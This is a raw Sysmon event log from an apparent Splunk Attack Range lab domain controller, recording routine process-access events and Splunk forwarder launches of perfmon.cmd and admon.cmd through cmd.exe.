13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.658{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.660{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.548{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.550{59A5CD1D-8E5C-6005-6400-00000000A301}3520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.439{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6300-00000000A301}3512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 